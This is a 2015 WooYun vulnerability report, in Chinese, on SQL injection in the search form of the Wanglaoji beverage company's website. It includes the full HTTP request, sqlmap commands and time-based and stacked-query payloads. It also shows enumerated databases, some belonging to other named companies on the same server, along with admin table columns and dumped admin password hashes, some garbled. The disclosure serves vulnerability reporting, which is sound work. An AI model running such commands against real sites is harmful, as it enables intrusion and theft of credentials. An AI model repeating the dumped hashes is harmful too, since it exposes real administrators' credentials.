当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107471

漏洞标题:王老吉官网SQL注入可获取用户名密码等敏感信息(波及其他网站数据库)

相关厂商:广州王老吉药业股份有限公司

漏洞作者: 路人甲

提交时间:2015-04-14 15:54

修复时间:2015-05-29 15:54

公开时间:2015-05-29 15:54

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

搜索功能的POST参数注入,注入之后发现这个服务器上还放了其他几个网站的数据库文件:
广州轻工:http://www.gzlig.com/
广百集团:http://gbjt.com.cn/
深圳市金凤凰家具:http://szjfh.com/
好太太:http://www.hotata.com/
没有深入确认是不是这几家的WEB前端也存在sql注入,不过这几家的官网首页HTML代码上都有:
<meta name="Author" content="优网科技 www.uweb.net.cn LiLee">
那应该是这家优网科技给做的,还是很有修复必要的~
搜索功能的POST参数注入

漏洞证明:

提交一个搜索的HTTP头部:
———————————————————————————————————————————
POST /en/search.aspx HTTP/1.1
Content-Length: 13
Content-Type: application/x-www-form-urlencoded
Referer: http://www.wlj.com.cn:80/
Cookie: ASP.NET_SessionId=ttaojnm3mp4jq0zhsq510xma; CheckCode=60R6
Host: www.wlj.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
keyword=1
———————————————————————————————————————————
用sqlmap跑数据库(dbms尝试Microsoft SQL Server):
sqlmap.py -r 2.txt --dbs -p keyword --dbms "Microsoft SQL Server"
---
Place: POST
Parameter: keyword
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: keyword=1'); WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: keyword=1') WAITFOR DELAY '0:0:5'--
---
available databases [38]:
[*] [aspnet63\x02]
[*] aspnet50
[*] aspnet52
[*] bbsopweiyuiom
[*] bbssuofeiya
[*] chinazocecom
[*] coursefanscom2
[*] dboppeintest2
[*] dboupaimumen
[*] gbjtcomcn
[*] gyzxxsycn
[*] gzlglibcom1
[*] gzligcom
[*] gzsummitcom
[*] haitianfoodc
[*] holikecomcn2
[*] holikecomcn21
[*] holikecomco22
[*] hotatacom
[*] iangzhuncom
[*] liwanyiyuan
[*] LLBGDCYLORG
[*] master
[*] model
[*] msdb
[*] naoyounetcn
[*] oppeincn1
[*] oppeincns63
[*] pearl@iverpia2
[*] s63dbspwljcom
[*] sanjinyuacom
[*] shenlaohrcom
[*] suofeiyacomc
[*] szjfhcom
[*] tempdb
[*] wljcomcn
[*] zhupai2
[*] zy813zycom
找到王老吉对应的数据库wljcomcn跑表:
sqlmap.py -r 2.txt -p keyword --dbms "Microsoft SQL Server" -D wljcomcn --tables
Database: wljcomcn
[33 tables]
+------------------+
| dbo.DB_Adplica |
| dbo.DB_Ads |
| dbo.DB_Comm |
| dbo.DB_Company |
| dbo.DB_DFile |
| dbo.DB_Deeptree |
| dbo.DB_FLink |
| dbo.DB_Feedback |
| dbo.DB_Feedback2 |
| dbo.DB_Feedback3 |
| dbo.DB_Feedback4 |
| dbo.DB_News |
| dbo.DB_Order |
| dbo.DB_Products |
| dbo.DB_Recommend |
| dbo.DB_Resume |
| dbo.DB_SNov |
| dbo.DB_SerachA |
| dbo.DB_Tv |
| dbo.DB_UGroup |
| dbo.DB_cam |
| dbo.DB_zy |
| dbo.Sys_Site |
| dbo.[DB_bz!] |
| dbo.sys_UserInfo |
| dbo.sys_admin |
| dbo.sys_em |
| dbo.sys_emgroup |
| dbo.sys_emlist |
| dbo.sys_gather |
| dbo.sys_menu |
| dbo.sys_note |
| dbo.sys_tmpnews |
+------------------+
发现dbo.sys_admin,跑dbo.sys_admin里面的列:
sqlmap.py -r 2.txt -p keyword --dbms "Microsoft SQL Server" -D wljcomcn -T dbo.sys_admin --columns
Database: wljcomcn
Table: dbo.sys_admin
[9 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| [username\x05A] |
| [wQa\x11] |
| addtime | datetխme |
| adminClass | int\t |
| id | int |
| namq |
| parts | ntext |
| passwords | nvarchar |
| ver | nvarchar |
+-----------------+----------+
开始获取密码了:
sqlmap.py -r 2.txt -p keyword --dbms "Microsoft SQL Server" -D wljcomcn -T dbo.sys_admin -C passwords --dump
Database: wljcomcn
Table: dbo.sys_admin
[8 entries]
+----------------------------------------------+
| passwords |
+----------------------------------------------+
| 50a5c3=83f67a0afb907fd6a46108?7b |
| 50a5c3983f67a0afb907fd6a4610837b |
| 5f484kf8e80ds7a78cA?x?97?f1\x9bfb4?a? |
| ?@0\x816fbd524c\x814fd2<1112A174=de8cd |
| a0a6c3a8?f67a\x81afb9O7f\x7f6\x814l109@7dA\r |
| a634\x81830655c53c5c6c37b3344a8@50e |
| \x7f6A44?30@55h?3c5c6c37b3<44a80?0?A |
| 6?538b89436baa59c344e4bf10fa61c8 |
+----------------------------------------------+
好了,不做了,我把手里这罐王老吉喝完吧...

修复方案:

对输入进行过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)